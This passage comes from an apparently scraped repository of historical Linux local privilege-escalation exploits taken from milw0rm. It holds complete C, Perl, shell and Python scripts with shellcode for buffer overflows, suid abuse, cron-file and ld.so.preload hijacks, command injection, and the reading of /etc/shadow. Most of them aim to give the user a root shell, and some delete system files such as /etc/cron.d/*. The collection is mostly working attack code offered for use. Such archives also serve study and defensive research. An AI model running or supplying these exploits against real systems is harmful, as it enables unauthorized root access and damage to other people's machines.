addr_ptr = (long *) ptr; 41 | for (i = 0; i < bsize; i+=4) 42 | *(addr_ptr++) = addr; 43 | 44 | for (i = 0; i < bsize/2; i++) 45 | buff[i] = NOP; 46 | 47 | ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); 48 | for (i = 0; i < strlen(shellcode); i++) 49 | *(ptr++) = shellcode[i]; 50 | 51 | buff[bsize - 1] = '\0'; 52 | 53 | memcpy(buff,"EGG=",4); 54 | putenv(buff); 55 | sprintf(environ,"ORACLE_HOME=%s",ORACLE_HOME); 56 | putenv(environ); 57 | sprintf(binary,"%s/bin/oidldapd connect=$EGG",ORACLE_HOME); 58 | system(binary); 59 | } 60 | 61 | 62 | // milw0rm.com [2000-11-16] 63 | -------------------------------------------------------------------------------- /linux/linux_exploits/1831.txt: -------------------------------------------------------------------------------- 1 | # tiffsplit (libtiff <= 3.8.2) local stack buffer overflow PoC 2 | 3 | tiffsplit from libtiff (http://www.remotesensing.org/libtiff/) 4 | is vulnerable to a bss-based and stack-based overflow, but, I just 5 | wrote the concept c0de for stack-based b0f 'cause I don't know how 6 | to take advantage of the overwritten bss data (after the overflow, 7 | that data is overwritten again correctly by a program' function). 8 | 9 | .bss section is in higher addresses than .dtors section, so, we 10 | can't hijack .dtors to.... 11 | 12 | PoC: http://www.exploit-db.com/sploits/05262006-tiffspl33t.tar.gz 13 | 14 | nitr0us 15 | 16 | # milw0rm.com [2006-05-26] 17 | -------------------------------------------------------------------------------- /linux/linux_exploits/186.pl: -------------------------------------------------------------------------------- 1 | /* 2 | (linux)splumber[version2] buffer overflow, by v9[v9@fakehalo.org]. this is 3 | a misc. exploit for the linux-SVGAlib space plumber game. which, as you 4 | know needs to be installed setuid root. this overflow is due to a simple 5 | oversight in the command line parser. uses strcpy() to copy to an unchecked 6 | 250 byte buffer. 7 | 8 | note: i also noticed, other than just being setuid root in the makefile, it 9 | sets splumber's permissions to 4777. *g* 10 | 11 | ...and here is the perl script for the lazy person: 12 | 13 | #!/usr/bin/perl 14 | $i=$ARGV[0]; 15 | while(1){ 16 | print "using offset: $i.\n"; 17 | system("./xsplumber $i"); 18 | $i+=50; 19 | } 20 | */ 21 | 22 | #define PATH "/usr/games/splumber" // change to the correct path. 23 | #define BUFFER_SIZE 257 // don't change. 24 | #define DEFAULT_OFFSET -300 // worked for me. 25 | 26 | static char exec[]= 27 | "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56" 28 | "\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80" 29 | "\xe8\xd7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01"; // still like it. 30 | 31 | long esp(void){__asm__("movl %esp,%eax");} 32 | int main(int argc,char **argv){ 33 | char bof[BUFFER_SIZE]; 34 | int i,offset; 35 | long ret; 36 | if(argc>1){offset=atoi(argv[1]);} 37 | else{offset=DEFAULT_OFFSET;} 38 | ret=(esp()-offset); 39 | printf("*** (linux)splumber[version2] local buffer overflow, by v9[v9@fakehalo.org].\n"); 40 | printf("*** return address: 0x%lx, offset: %d.\n",ret,offset); 41 | for(i=0;i<(252-strlen(exec));i++){*(bof+i)=0x90;} 42 | memcpy(bof+i,exec,strlen(exec)); 43 | *(long *)&bof[i+strlen(exec)]=ret; // perfect, not lazy for once. 44 | bof[BUFFER_SIZE-1]=0; 45 | if(execlp(PATH,"splumber",bof,0)){ 46 | printf("error: program did not execute properly, check the path.\n"); 47 | exit(0); 48 | } 49 | } 50 | 51 | 52 | # milw0rm.com [2000-11-17] 53 | -------------------------------------------------------------------------------- /linux/linux_exploits/193.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Redhat 6.2 dump command executes external program 4 | # with suid priviledge. 5 | # Discovered by Mat 6 | # Written for and by a scriptkid Tasc ;P 7 | # Remember, there's no cure for BSE 8 | 9 | echo "dump-0.4b15 root exploit" 10 | echo "Discovered by Mat " 11 | echo "-------------------------------------" 12 | echo 13 | DUMP=/sbin/dump 14 | if [ ! -u $DUMP ]; then 15 | echo "$DUMP is NOT setuid on this system or does not exist at all!" 16 | echo 17 | exit 0 18 | fi 19 | export TAPE=iamlame:iamlame 20 | export RSH=/tmp/rsh 21 | cat >/tmp/rsh <<__eof__ 22 | #!/bin/sh 23 | cp /bin/sh /tmp/sush 24 | chmod 4755 /tmp/sush 25 | } 26 | __eof__ 27 | chmod 755 /tmp/rsh 28 | /sbin/dump -0 / 29 | echo 30 | echo "Waiting for rootshell .... 5 seconds...." 31 | sleep 5 32 | /tmp/sush 33 | id 34 | 35 | 36 | # milw0rm.com [2000-11-19] 37 | -------------------------------------------------------------------------------- /linux/linux_exploits/2004.c: -------------------------------------------------------------------------------- 1 | /*****************************************************/ 2 | /* Local r00t Exploit for: */ 3 | /* Linux Kernel PRCTL Core Dump Handling */ 4 | /* ( BID 18874 / CVE-2006-2451 ) */ 5 | /* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */ 6 | /* By: */ 7 | /* - dreyer (main PoC code) */ 8 | /* - RoMaNSoFt (local root code) */ 9 | /* [ 10.Jul.2006 ] */ 10 | /*****************************************************/ 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n"; 22 | 23 | int main() { 24 | int child; 25 | struct rlimit corelimit; 26 | printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n"); 27 | printf("By: dreyer & RoMaNSoFt\n"); 28 | printf("[ 10.Jul.2006 ]\n\n"); 29 | 30 | corelimit.rlim_cur = RLIM_INFINITY; 31 | corelimit.rlim_max = RLIM_INFINITY; 32 | setrlimit(RLIMIT_CORE, &corelimit); 33 | 34 | printf("[*] Creating Cron entry\n"); 35 | 36 | if ( !( child = fork() )) { 37 | chdir("/etc/cron.d"); 38 | prctl(PR_SET_DUMPABLE, 2); 39 | sleep(200); 40 | exit(1); 41 | } 42 | 43 | kill(child, SIGSEGV); 44 | 45 | printf("[*] Sleeping for aprox. one minute (** please wait **)\n"); 46 | sleep(62); 47 | 48 | printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n"); 49 | system("/tmp/sh -i"); 50 | } 51 | 52 | // milw0rm.com [2006-07-11] 53 | -------------------------------------------------------------------------------- /linux/linux_exploits/2009-therebel.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1N3/PrivEsc/33b129469180d85e77a03f1ba34b48e08843b20e/linux/linux_exploits/2009-therebel.tgz -------------------------------------------------------------------------------- /linux/linux_exploits/2009-wunderbar_emporium.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/1N3/PrivEsc/33b129469180d85e77a03f1ba34b48e08843b20e/linux/linux_exploits/2009-wunderbar_emporium.tgz -------------------------------------------------------------------------------- /linux/linux_exploits/2011.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # PRCTL local root exp By: Sunix 4 | # + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp 5 | # tested on Intel(R) Xeon(TM) CPU 3.20GHz 6 | # kernel 2.6.9-22.ELsmp 7 | # maybe others ... 8 | # Tx to drayer & RoMaNSoFt for their clear code... 9 | # 10 | # zmia23@yahoo.com 11 | 12 | 13 | cat > /tmp/getsuid.c << __EOF__ 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | 23 | char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n"; 24 | 25 | int main() { 26 | int child; 27 | struct rlimit corelimit; 28 | corelimit.rlim_cur = RLIM_INFINITY; 29 | corelimit.rlim_max = RLIM_INFINITY; 30 | setrlimit(RLIMIT_CORE, &corelimit); 31 | if ( !( child = fork() )) { 32 | chdir("/etc/cron.d"); 33 | prctl(PR_SET_DUMPABLE, 2); 34 | sleep(200); 35 | exit(1); 36 | } 37 | kill(child, SIGSEGV); 38 | sleep(120); 39 | } 40 | __EOF__ 41 | 42 | cat > /tmp/s.c << __EOF__ 43 | #include 44 | main(void) 45 | { 46 | setgid(0); 47 | setuid(0); 48 | system("/bin/sh"); 49 | system("rm -rf /tmp/s"); 50 | system("rm -rf /etc/cron.d/*"); 51 | return 0; 52 | } 53 | __EOF__ 54 | echo "wait aprox 4 min to get sh" 55 | cd /tmp 56 | cc -o s s.c 57 | cc -o getsuid getsuid.c 58 | ./getsuid 59 | ./s 60 | rm -rf getsuid* 61 | rm -rf s.c 62 | rm -rf prctl.sh 63 | 64 | # milw0rm.com [2006-07-14] 65 | -------------------------------------------------------------------------------- /linux/linux_exploits/2015.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ############################################################################## 3 | ## rocksumountdirty.py: Rocks release <=4.1 local root exploit 4 | ## quick and nasty version of the exploit. make sure the . is writable and 5 | ## you clean up afterwards. ;) 6 | ## 7 | ## coded by: xavier@tigerteam.se [http://xavsec.blogspot.com] 8 | ############################################################################## 9 | x=__import__('os');c=x.getcwd() 10 | open('%s/x'%c, 'a').write("#!/bin/sh\ncp /bin/ksh %s/shell\nchmod a+xs %s/shell\nchown root.root %s/shell\n" % (c,c,c)) 11 | print "Rocks Clusters <=4.1 umount-loop local root exploit by xavier@tigerteam.se [http://xavsec.blogspot.com]" 12 | x.system('umount-loop "\`sh %s/x\`"'%c);x.system("%s/shell"%c) 13 | 14 | # milw0rm.com [2006-07-15] 15 | -------------------------------------------------------------------------------- /linux/linux_exploits/2016.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | ############################################################################## 3 | ## rocksmountdirty.sh: Rocks release <=4.1 local root exploit 4 | ## make sure 'mount-loop' is in your path for this to work. 5 | ## 6 | ## coded by: xavier@tigerteam.se [http://xavsec.blogspot.com] 7 | ############################################################################## 8 | echo "Rocks Clusters <=4.1 mount-loop local root exploit by xavier@tigerteam.se [http://xavsec.blogspot.com]" 9 | echo "getting root.. goodluck" 10 | mount-loop "null" "null" "null; python -c 'import os;os.setuid(0);os.setgid(0);os.execl(\"/bin/sh\", \"/usr/sbin/httpd\")'" 11 | 12 | # milw0rm.com [2006-07-15] 13 | -------------------------------------------------------------------------------- /linux/linux_exploits/205.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | # 3 | # exploits suid privledges on rcp 4 | # Not really tested this but hey 5 | # works on redhat6.2 6 | # not werk on freebsd4.1 stable 7 | # 8 | # bug discovered by 9 | # Andrew Griffiths 10 | # 11 | # Exploit written by tlabs 12 | # greetz to those that know me innit 13 | # 14 | # Please set your rcpfile 15 | # this can be found by doing 16 | # 17 | # ls -alF `which rcp` 18 | # 19 | # have a lot of fun 20 | 21 | $RCPFILE="/usr/bin/rcp" ; 22 | 23 | # configure above innit 24 | 25 | sub USAGE 26 | { 27 | print "$0\nWritten by Tlabs\n" ; 28 | exit 0 ; 29 | } 30 | 31 | if ( ! -u "$RCPFILE" ) 32 | { 33 | printf "rcp is not suid, quiting\n" ; 34 | exit 0; 35 | } 36 | 37 | open(TEMP, ">>/tmp/shell.c")|| die "Something went wrong: $!" ; 38 | printf TEMP "#include\n#include\nint main()\n{" ; 39 | printf TEMP " setuid(0);\n\tsetgid(0);\n\texecl(\"/bin/sh\",\"sh\",0);\n\treturn 0;\n}\n" ; 40 | close(TEMP); 41 | open(HMM, ">hey")|| die "Something went wrong: $!"; 42 | print HMM "Sploit written by tlabs, thanks to Andrew Griffiths for the bug report" ; 43 | close(HMM); 44 | 45 | system "rcp 'hey geezer; gcc -o /tmp/shell /tmp/shell.c;' localhost 2> /dev/null" ; 46 | system "rcp 'hey geezer; chmod +s /tmp/shell;' localhost 2> /dev/null" ; 47 | unlink("/tmp/shell.c"); 48 | unlink("hey"); 49 | unlink("geezer"); 50 | printf "Ok, too easy, we'll just launch a shell, lets hope shit went well, innit:)\n" ; 51 | 52 | exec '/tmp/shell' ; 53 | 54 | 55 | # milw0rm.com [2000-11-29] 56 | -------------------------------------------------------------------------------- /linux/linux_exploits/2144.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo 3 | echo "mtink libXm local root exploit" 4 | echo "* karol@wiesek.pl *" 5 | echo 6 | umask 000 7 | export DEBUG_FILE="/etc/ld.so.preload" 8 | cat > /tmp/lib.c << _EOF 9 | #include 10 | void _init(void) 11 | { 12 | if (getuid()!=0 && geteuid()==0) 13 | { 14 | setuid(0); 15 | unlink("/etc/ld.so.preload"); 16 | execl("/bin/bash", "bash", 0); 17 | } 18 | } 19 | _EOF 20 | /usr/bin/gcc -o /tmp/lib.o -c /tmp/lib.c 21 | /usr/bin/ld -shared -o /tmp/lib.so /tmp/lib.o 22 | /usr/bin/mtink 23 | echo "/tmp/lib.so" > /etc/ld.so.preload 24 | /bin/ping 25 | 26 | # milw0rm.com [2006-08-08] 27 | -------------------------------------------------------------------------------- /linux/linux_exploits/221.c: -------------------------------------------------------------------------------- 1 | /* 2 | * (kwintv) local buffer overflow. (gid=video(33)) 3 | * 4 | * Author: Cody Tubbs (loophole of hhp). 5 | * www.hhp-programming.net / pigspigs@yahoo.com 6 | * 12/17/2000 7 | * 8 | * For SuSE 7.0 - x86. 9 | * sgid "video"(33) by default. 10 | * 11 | * bash-2.04$ id 12 | * uid=1000(loophole) gid=501(noc) 13 | * bash-2.04$ ./b 0 14 | * Ret-addr 0xbfffe1fc, offset: 0, allign: 0. 15 | * sh-2.04$ id 16 | * uid=1000(loophole) gid=33(video) 17 | * sh-2.04$ 18 | * 19 | */ 20 | 21 | #include 22 | 23 | #define OFFSET 0 24 | #define ALLIGN 0 25 | #define NOP 0x90 26 | #define DBUF 481 //481+((RET)). 27 | #define GID 33 28 | 29 | static char shellcode[]= 30 | "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x00\x31\xc0" 31 | "\xb0\x47\xcd\x80\x31\xdb\x31\xc9\xb3\x00\xb1\x00\x31" 32 | "\xc0\xb0\x47\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0" 33 | "\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08" 34 | "\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8" 35 | "\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x69"; 36 | 37 | long get_sp(void){ 38 | __asm__("movl %esp,%eax"); 39 | } 40 | 41 | void workit(char *heh){ 42 | fprintf(stderr, "\n(kwintv) local exploit for SuSE 7.0 - x86\n"); 43 | fprintf(stderr, "Author: Cody Tubbs (loophole of hhp)\n\n"); 44 | fprintf(stderr, "Usage: %s [allign(0..3)]\n", heh); 45 | fprintf(stderr, "Examp: %s 0\n", heh); 46 | fprintf(stderr, "Examp: %s 0 1\n", heh); 47 | exit(1); 48 | } 49 | 50 | 51 | main(int argc, char **argv){ 52 | char eipeip[DBUF], buffer[4096], heh[DBUF+1]; 53 | int i, offset, gid, allign; 54 | long address; 55 | 56 | if(argc<2){ 57 | workit(argv[0]); 58 | } 59 | 60 | if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;} 61 | if(argc>2){allign=atoi(argv[2]);}else{allign=ALLIGN;} 62 | 63 | address=get_sp()-offset; 64 | 65 | if(allign>0){for(i=0;i 16 | #define DBUF 287 // 56(fun)+RET+227! 17 | #define OFFSET 0 // Change if fails. 18 | 19 | static char shellcode[]= 20 | "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" 21 | "\x66\x31\xc0\x66\x31\xdb\xb0\x2e\xcd\x80" 22 | "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46" 23 | "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" 24 | "\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff" 25 | "/bin/sh\x69"; 26 | 27 | long get_sp(void){__asm__("movl %esp,%eax");} 28 | main(int argc, char **argv){ 29 | char eipeip[DBUF]=" Don't forget to check www.hhp-programming.net"; 30 | char buffer[4096], heh[256+1]; // ^ :D 31 | int i, offset; 32 | long address; 33 | if(argc>1){offset=atoi(argv[1]);} 34 | else{offset=OFFSET;} 35 | address=get_sp()-offset; 36 | for(i=56;i 2 | #include 3 | 4 | #define NOP 0x90 5 | #define BUFSIZE 4408 6 | #define OFFSET 0 7 | #define RANGE 20 8 | 9 | unsigned char blah[] = 10 | "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa" 11 | "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01" 12 | "\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11" 13 | "\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9" 14 | "\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01" 15 | "\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c" 16 | "\xc2\x91"; 17 | 18 | long get_sp () { __asm__ ("mov %esp, %eax"); } 19 | 20 | int 21 | main (int argc, char *argv[]) 22 | { 23 | char buffer[BUFSIZE]; 24 | int i, offset; 25 | unsigned long ret; 26 | 27 | if (argc > 1) 28 | offset = atoi(argv[1]); 29 | else 30 | offset = OFFSET; 31 | 32 | for (i = 0; i < (BUFSIZE - strlen (blah) - RANGE*2); i++) 33 | *(buffer + i) = NOP; 34 | 35 | memcpy (buffer + i, blah, strlen (blah)); 36 | 37 | ret = get_sp(); 38 | for (i = i + strlen (blah); i < BUFSIZE; i += 4) 39 | *(long *) &buffer[i] = ret+offset; 40 | 41 | fprintf(stderr, "xsoldier-0.96 exploit for Red Hat Linux release 6.2 (Zoot)\n"); 42 | fprintf(stderr, "zorgon@antionline.org\n"); 43 | fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", ret + offset, offset, BUFSIZE); 44 | execl ("./xsoldier", "xsoldier", "-display", buffer, 0); 45 | } 46 | 47 | 48 | // milw0rm.com [2000-12-15] 49 | -------------------------------------------------------------------------------- /linux/linux_exploits/231.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # Grab local pine messages 3 | # Usage: ./mon_pine.sh 4 | # victim pine must use following settings 5 | # 6 | # mat@hacksware.com 7 | # http://hacksware.com 8 | # 9 | # [x] enable-alternate-editor-cmd 10 | # [x] enable-alternate-editor-implicitly 11 | # editor = /usr/bin/vi 12 | # 13 | 14 | PID=$1 15 | PICO_FILE=`printf "/tmp/pico.%.6d" $PID` 16 | TRASHCAN=/tmp/.trashcan.`date|sed "s/ //g"` 17 | echo PICO_FILE is $PICO_FILE 18 | 19 | #if $PICO_FILE and $TRASHCAN exists, remove them 20 | if test -f $PICO_FILE 21 | then 22 | rm -f $PICO_FILE 23 | fi 24 | if test -f $TRASHCAN 25 | then 26 | rm -f $TRASHCAN 27 | fi 28 | 29 | ln -s $TRASHCAN $PICO_FILE 30 | while : 31 | do 32 | if test -f $TRASHCAN 33 | then 34 | break 35 | fi 36 | done 37 | 38 | echo Victim is Editing Pine Message 39 | rm -f $PICO_FILE 40 | echo We replace temporary file 41 | touch $PICO_FILE 42 | chmod 777 $PICO_FILE 43 | echo "Get the message from "$PICO_FILE 44 | echo "^C to break tailer" 45 | tail -f $PICO_FILE 46 | 47 | 48 | # milw0rm.com [2000-12-15] 49 | -------------------------------------------------------------------------------- /linux/linux_exploits/2466.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | 3 | # 10/01/06 - cPanel <= 10.8.x cpwrap root exploit via mysqladmin 4 | # use strict; # haha oh wait.. 5 | 6 | my $cpwrap = "/usr/local/cpanel/bin/cpwrap"; 7 | my $mysqlwrap = "/usr/local/cpanel/bin/mysqlwrap"; 8 | my $pwd = `pwd`; 9 | 10 | chomp $pwd; 11 | $ENV{'PERL5LIB'} = "$pwd"; 12 | 13 | if ( ! -x "/usr/bin/gcc" ) { die "gcc: $!\n"; } 14 | if ( ! -x "$cpwrap" ) { die "$cpwrap: $!\n"; } 15 | if ( ! -x "$mysqlwrap" ) { die "$mysqlwrap: $!\n"; } 16 | 17 | open (CPWRAP, "<$cpwrap") or die "Could not open $cpwrap: $!\n"; 18 | while() { 19 | if(/REMOTE_USER/) { die "$cpwrap is patched.\n"; } 20 | } 21 | close (CPWRAP); 22 | 23 | open (STRICT, ">strict.pm") or die "Can't open strict.pm: $!\n"; 24 | print STRICT "\$e = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\"/bin/bash\\\\\\\");}\";\n"; 25 | print STRICT "system(\"/bin/echo -n \\\"\$e\\\">Maildir.c\");\n"; 26 | print STRICT "system(\"/usr/bin/gcc Maildir.c -o Maildir\");\n"; 27 | print STRICT "system(\"/bin/chmod 4755 Maildir\");\n"; 28 | print STRICT "system(\"/bin/rm -f Maildir.c strict.pm\");\n"; 29 | close (STRICT); 30 | 31 | system("$mysqlwrap DUMPMYSQL 2>/dev/null"); 32 | 33 | if ( -e "Maildir" ) { 34 | system("./Maildir"); 35 | } 36 | else { 37 | unlink "strict.pm"; 38 | die "Failed\n"; 39 | } 40 | 41 | # milw0rm.com [2006-10-01] 42 | -------------------------------------------------------------------------------- /linux/linux_exploits/252.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | ## (c) Copyright teleh0r@doglover.com / anno domani 2000 4 | ## 5 | ## Seyon Exploit / Tested Version 2.1 rev. 4b i586-Linux 6 | ## Tested on: RedHat 4.0/5.1 7 | ## 8 | ## Greets: scrippie, *@HWA, grazer, mixter, pr0ix, s\ 9 | ## http://www.digit-labs.org/ || http://teleh0r.cjb.net/ 10 | 11 | 12 | $shellcode = 13 | "\xeb\x1f". #/* jmp 0x1f */ 14 | "\x5e". #/* popl %esi */ 15 | "\x89\x76\x08". #/* movl %esi,0x8(%esi) */ 16 | "\x31\xc0". #/* xorl %eax,%eax */ 17 | "\x88\x46\x07". #/* movb %eax,0x7(%esi) */ 18 | "\x89\x46\x0c". #/* movl %eax,0xc(%esi) */ 19 | "\xb0\x0b". #/* movb $0xb,%al */ 20 | "\x89\xf3". #/* movl %esi,%ebx */ 21 | "\x8d\x4e\x08". #/* leal 0x8(%esi),%ecx */ 22 | "\x8d\x56\x0c". #/* leal 0xc(%esi),%edx */ 23 | "\xcd\x80". #/* int $0x80 */ 24 | "\x31\xdb". #/* xorl %ebx,%ebx */ 25 | "\x89\xd8". #/* movl %ebx,%eax */ 26 | "\x40". #/* inc %eax */ 27 | "\xcd\x80". #/* int $0x80 */ 28 | "\xe8\xdc\xff\xff\xff". #/* call -0x24 */ 29 | "/bin/sh"; #/* .string \"/bin/sh\" */ 30 | 31 | 32 | $ret = 0xbfffef96; 33 | $egg = 500; 34 | $len = 208; 35 | $nop = 'A'; 36 | 37 | if (@ARGV == 1) { 38 | $offset = $ARGV[0]; 39 | } 40 | 41 | if (!($ENV{'DISPLAY'})) { 42 | die("Error: the shell variable DISPLAY is not set.\n"); 43 | } 44 | 45 | $buffer .= $nop; 46 | $new_ret = pack('l',($ret + $offset)); 47 | 48 | print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n"); 49 | sleep(1); 50 | 51 | for ($i = 0; $i < $len; $i += 4) { 52 | $buffer .= pack('l',($ret + $offset)); 53 | } 54 | 55 | for ($i = 0; $i < ($egg - length($shellcode)); $i++) { 56 | $buffer .= $nop; 57 | } 58 | 59 | $buffer .= $shellcode; 60 | 61 | # seyon uses X, so if there is no X server running, or you 62 | # are not allowed to connect to it, start X on your machine, 63 | # and using xhost, allow the target to connect to your server, 64 | # then: export DISPLAY=your-ip:0.0 - and execute the exploit. 65 | 66 | exec("/usr/X11R6/bin/seyon -noemulator \"$buffer\""); 67 | 68 | 69 | # milw0rm.com [2001-01-15] 70 | -------------------------------------------------------------------------------- /linux/linux_exploits/255.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | ## Redhat 6.1 man exploit - gives egid 15 4 | ## Written just for fun - teleh0r@doglover.com 5 | 6 | 7 | $shellcode = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07". 8 | "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b". 9 | "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff". 10 | "\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x01"; 11 | 12 | 13 | $len = 4062; # -- Sufficient to overwrite EIP. 14 | $nop = "\x90"; # -- x86 NOP. 15 | $ret = 0xbfffbb24; # -- ESP / Return value. 16 | $offset = -800; # -- Default offset to try. 17 | 18 | 19 | if (@ARGV == 1) { 20 | $offset = $ARGV[0]; 21 | } 22 | 23 | for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) { 24 | $buffer .= $nop; 25 | } 26 | 27 | # [ Buffer: NNNNNNNNNNNNNN ] 28 | 29 | # Add the shellcode to the buffer. 30 | 31 | $buffer .= $shellcode; 32 | 33 | # [ Buffer: NNNNNNNNNNNNNNSSSSS ] 34 | 35 | $address = sprintf('%lx', ($ret + $offset)); 36 | $new_ret = pack('l', ($ret + $offset)); 37 | 38 | print("Address: 0x$address / Offset: $offset\n"); 39 | sleep(1); 40 | 41 | # Fill the rest of the buffer (length 100) with RET's. 42 | 43 | for ($i += length($shellcode); $i < $len; $i += 4) { 44 | $buffer .= $new_ret; 45 | } 46 | 47 | # [ Buffer: NNNNNNNNNNNNNNNNSSSSSRRRRRR ] 48 | 49 | local($ENV{'MANPAGER'}) = $buffer; exec("/usr/bin/man id"); 50 | 51 | 52 | # milw0rm.com [2001-01-19] 53 | -------------------------------------------------------------------------------- /linux/linux_exploits/257.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | ## jaZip Exploit / Tested version: jaZip-0.32-2 / anno 2000 4 | ## || http://teleh0r.cjb.net/ 5 | ## Vulnerable: Turbolinux 6.0 6 | ## 7 | ## [teleh0r@localhost teleh0r]$ rpm -q jaZip 8 | ## jaZip-0.32-2 9 | ## [teleh0r@localhost teleh0r]$ ./jazip-exploit.pl 10 | ## Address: 0xbffff7ac 11 | ## bash# 12 | 13 | 14 | $shellcode = # Shellcode by: Taeho Oh 15 | "\xeb\x1f". #/* jmp 0x1f */ 16 | "\x5e". #/* popl %esi */ 17 | "\x89\x76\x08". #/* movl %esi,0x8(%esi) */ 18 | "\x31\xc0". #/* xorl %eax,%eax */ 19 | "\x88\x46\x07". #/* movb %eax,0x7(%esi) */ 20 | "\x89\x46\x0c". #/* movl %eax,0xc(%esi) */ 21 | "\xb0\x0b". #/* movb $0xb,%al */ 22 | "\x89\xf3". #/* movl %esi,%ebx */ 23 | "\x8d\x4e\x08". #/* leal 0x8(%esi),%ecx */ 24 | "\x8d\x56\x0c". #/* leal 0xc(%esi),%edx */ 25 | "\xcd\x80". #/* int $0x80 */ 26 | "\x31\xdb". #/* xorl %ebx,%ebx */ 27 | "\x89\xd8". #/* movl %ebx,%eax */ 28 | "\x40". #/* inc %eax */ 29 | "\xcd\x80". #/* int $0x80 */ 30 | "\xe8\xdc\xff\xff\xff". #/* call -0x24 */ 31 | "/bin/sh"; #/* .string \"/bin/sh\" */ 32 | 33 | 34 | $ret = 0xbffff7ac; # May have to be modified. 35 | $len = 2100; 36 | $nop = 'A'; 37 | 38 | if (@ARGV == 1) { 39 | $offset = $ARGV[0]; 40 | } 41 | 42 | for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) { 43 | $buffer .= $nop; 44 | } 45 | 46 | $buffer .= $shellcode; 47 | 48 | print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n"); 49 | $new_ret = pack('l',($ret + $offset)); 50 | $buffer .= $nop x 3; # May have to be modified / 5 for Debian. 51 | 52 | for ($i += length($shellcode); $i < $len; $i += 4) { 53 | $buffer .= $new_ret; 54 | } 55 | 56 | if ($ENV{'DISPLAY'}) { 57 | delete($ENV{'DISPLAY'}); 58 | } 59 | 60 | local($ENV{'DISPLAY'}) = $buffer; 61 | exec("/usr/X11R6/bin/jazip"); 62 | 63 | 64 | # milw0rm.com [2001-01-25] 65 | -------------------------------------------------------------------------------- /linux/linux_exploits/258.sh: -------------------------------------------------------------------------------- 1 | # Charles Stevenson 2 | # glibc-2.2 and openssh-2.3.0p1 (Debian 2.3 , Redhat 7.0) 3 | # This exploits is for glibc >= 2.1.9x. 4 | # (****krochos@linuxmail.org****) 5 | # Edit this if you have a problem with path 6 | 7 | ssh=/usr/bin/ssh 8 | traceroute=/usr/sbin/traceroute 9 | FILE=/etc/shadow # File to read 10 | ############################################################################### 11 | 12 | echo "$ssh" 13 | echo "[*] Checking permisions..." 14 | 15 | if [ ! -u $ssh ]; then 16 | echo "$ssh is NOT setuid on this system or does not exist at all!" 17 | if [ ! -u $traceroute ]; then 18 | echo "$traceroute is NOT setuid on this system or does not exist at all!" 